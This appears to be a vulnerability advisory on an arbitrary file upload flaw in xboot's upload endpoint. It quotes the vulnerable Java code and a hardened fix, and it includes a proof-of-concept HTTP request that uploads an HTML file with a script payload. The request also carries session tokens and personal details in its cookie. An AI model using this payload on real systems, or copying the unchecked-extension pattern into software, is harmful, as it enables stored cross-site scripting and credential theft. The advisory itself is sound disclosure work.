Summary
The endpoint "/xboot/upload/file" allows attackers to upload files with arbitrary extensions, creating a vector for stored Cross-Site Scripting (XSS) and potentially for Remote Code Execution (RCE).
Details
- xboot-fast/src/main/java/cn/exrick/xboot/modules/base/controller/common/UploadController.java
```java
@Slf4j
@RestController
@Api(tags = "文件上传接口")
@RequestMapping("/xboot/upload")
@Transactional
public class UploadController {

    @Value("${xboot.maxUploadFile}")
    private Integer maxUploadFile;

    @Autowired
    private QiniuUtil qiniuUtil;

    @RequestMapping(value = "/file", method = RequestMethod.POST)
    @ApiOperation(value = "文件上传")
    public Result<Object> upload(@RequestParam(required = false) MultipartFile file,
                                 @RequestParam(required = false) String base64) {

        if (file.getSize() > maxUploadFile * 1024 * 1024) {
            return ResultUtil.error("文件大小过大,不能超过" + maxUploadFile + "MB");
        }
        if (StrUtil.isNotBlank(base64)) {
            // base64 upload
            file = Base64DecodeMultipartFile.base64Convert(base64);
        }
        String result;
        // Only the base name is replaced; the client-supplied extension is kept unchanged
        String fileName = CommonUtil.renamePic(file.getOriginalFilename());
        try {
            InputStream inputStream = file.getInputStream();
            // Upload to Qiniu cloud storage
            result = qiniuUtil.qiniuInputStreamUpload(inputStream, fileName);
        } catch (Exception e) {
            log.error(e.toString());
            return ResultUtil.error(e.toString());
        }
        return ResultUtil.data(result);
    }
}
```
- xboot-fast/src/main/java/cn/exrick/xboot/common/utils/CommonUtil.java
```java
public static String renamePic(String fileName) {
    String extName = "";
    if (fileName.contains(".")) {
        // Everything from the last '.' onward is reused as-is, with no allowlist check
        extName = fileName.substring(fileName.lastIndexOf("."));
    }
    return IdUtil.simpleUUID() + extName;
}
```
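A hardened replacement for renamePic, written here as an added example and not xboot's own code: the extension must be on an allowlist, must match the file's leading bytes, and the server chooses the stored name. The class SafeUploadName, the method safeRename and the allowlist contents are assumptions for this example.

```java
import java.nio.charset.StandardCharsets;
import java.util.Arrays;
import java.util.Locale;
import java.util.Map;
import java.util.Set;
import java.util.UUID;

// Hypothetical hardened counterpart to CommonUtil.renamePic (added example, not project code).
public final class SafeUploadName {

    // Allowlist: only the extensions the upload feature actually needs to accept.
    private static final Set<String> ALLOWED = Set.of(".jpg", ".jpeg", ".png", ".gif");

    // Leading bytes ("magic numbers") expected for each allowed extension.
    private static final Map<String, byte[]> MAGIC = Map.of(
        ".jpg",  new byte[]{(byte) 0xFF, (byte) 0xD8, (byte) 0xFF},
        ".jpeg", new byte[]{(byte) 0xFF, (byte) 0xD8, (byte) 0xFF},
        ".png",  new byte[]{(byte) 0x89, 'P', 'N', 'G'},
        ".gif",  "GIF8".getBytes(StandardCharsets.US_ASCII)
    );

    private SafeUploadName() {}

    /**
     * Returns a random server-chosen name with a validated extension, or null when the
     * upload must be rejected. Unlike renamePic, the client-supplied extension is never
     * trusted on its own: it has to be allowlisted and agree with the file's leading bytes.
     */
    public static String safeRename(String originalName, byte[] head) {
        if (originalName == null || head == null) return null;
        int dot = originalName.lastIndexOf('.');
        if (dot < 0) return null;                       // no extension: reject rather than guess
        String ext = originalName.substring(dot).toLowerCase(Locale.ROOT);
        if (!ALLOWED.contains(ext)) return null;        // .html, .jsp, .svg and similar are refused here
        byte[] magic = MAGIC.get(ext);
        if (head.length < magic.length) return null;
        // Declared extension and actual content must agree
        if (!Arrays.equals(head, 0, magic.length, magic, 0, magic.length)) return null;
        return UUID.randomUUID().toString().replace("-", "") + ext;
    }

    public static void main(String[] args) {
        // Constructed inputs: the report's HTML payload and a genuine PNG signature.
        byte[] html = "<script>alert(1)</script>".getBytes(StandardCharsets.US_ASCII);
        byte[] png = {(byte) 0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A};
        System.out.println("xss.html  -> " + safeRename("xss.html", html));  // not allowlisted
        System.out.println("xss.png   -> " + safeRename("xss.png", html));   // extension/content mismatch
        System.out.println("photo.PNG -> " + safeRename("photo.PNG", png));  // allowlisted and consistent
    }
}
```

The caller would read the first few bytes of the MultipartFile stream for the head argument and refuse the request when safeRename returns null. Serving stored uploads from an origin separate from the application further limits what a stored script could do even if validation were bypassed.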
POC
```http
POST /xboot/upload/file HTTP/1.1
Host: localhost:9999
Content-Length: 231
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
accessToken: 65aa38a0b6034066bd7a080520dde446
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykm1yoRzGFrNZRql9
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.121 Safari/537.36
sec-ch-ua-platform: "macOS"
Accept: */*
Origin: http://localhost:9999
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:9999/open/client
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: _ga=GA1.1.1119679874.1749601651; CHAT2DB.USER_ID=2; _ga_V8M4E5SF61=GS2.1.s1749601650$o1$g1$t1749601661$j49$l0$h0; PUBLICCMS_ADMIN=1_98929ca2-feeb-4745-8c8b-83ce96a02974; PUBLICCMS_ANALYTICS_ID=3c11ec88-14ff-4a2d-945e-a76277395bfe; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1752119531,1752119879,1752126651,1752126882; cms.locale=zh; Hm_lvt_64e52d9ed8f5acc3eb7d60058e2fb7ab=1753156816; HMACCOUNT=71B59AD17A941F07; userInfo={%22id%22:%22682265633886208%22%2C%22createBy%22:%22%22%2C%22createTime%22:%222018-05-01%2003:13:51%22%2C%22updateBy%22:%22admin%22%2C%22updateTime%22:%222020-04-30%2004:56:32%22%2C%22delFlag%22:0%2C%22username%22:%22admin%22%2C%22password%22:null%2C%22nickname%22:%22%E7%AE%A1%E7%90%86%E5%91%98%22%2C%22mobile%22:%2218782059031%22%2C%22email%22:%[email protected]%22%2C%22address%22:%22%E5%8C%97%E4%BA%AC%E5%B8%82%2C%E5%B8%82%E8%BE%96%E5%8C%BA%2C%E4%B8%9C%E5%9F%8E%E5%8C%BA%22%2C%22street%22:%22%E5%A4%A9%E5%BA%9C1%E8%A1%97%22%2C%22sex%22:%22%E7%94%B7%22%2C%22passStrength%22:%22%E5%BC%B1%22%2C%22avatar%22:%22https://ooo.0o0.ooo/2019/04/28/5cc5a71a6e3b6.png%22%2C%22type%22:1%2C%22status%22:0%2C%22description%22:%22%E6%88%91%E6%98%AF%E5%A4%A7%E5%B8%85%E9%80%BC%22%2C%22departmentId%22:%2240322777781112832%22%2C%22departmentTitle%22:%22%E6%80%BB%E9%83%A8%22%2C%22birth%22:%222020-04-15%22%2C%22defaultRole%22:null}; videoShowed=videoShowed; Hm_lpvt_64e52d9ed8f5acc3eb7d60058e2fb7ab=1753163004
Connection: close

------WebKitFormBoundarykm1yoRzGFrNZRql9
Content-Disposition: form-data; name="file"; filename="xss.html"
Content-Type: image/jpeg

<script>alert("POC confirmed by ZAST");</script>
------WebKitFormBoundarykm1yoRzGFrNZRql9--
```
Impact
The stored XSS vulnerability allows attackers to execute arbitrary JavaScript in victims' browsers, enabling attacks such as phishing and theft of users' credentials.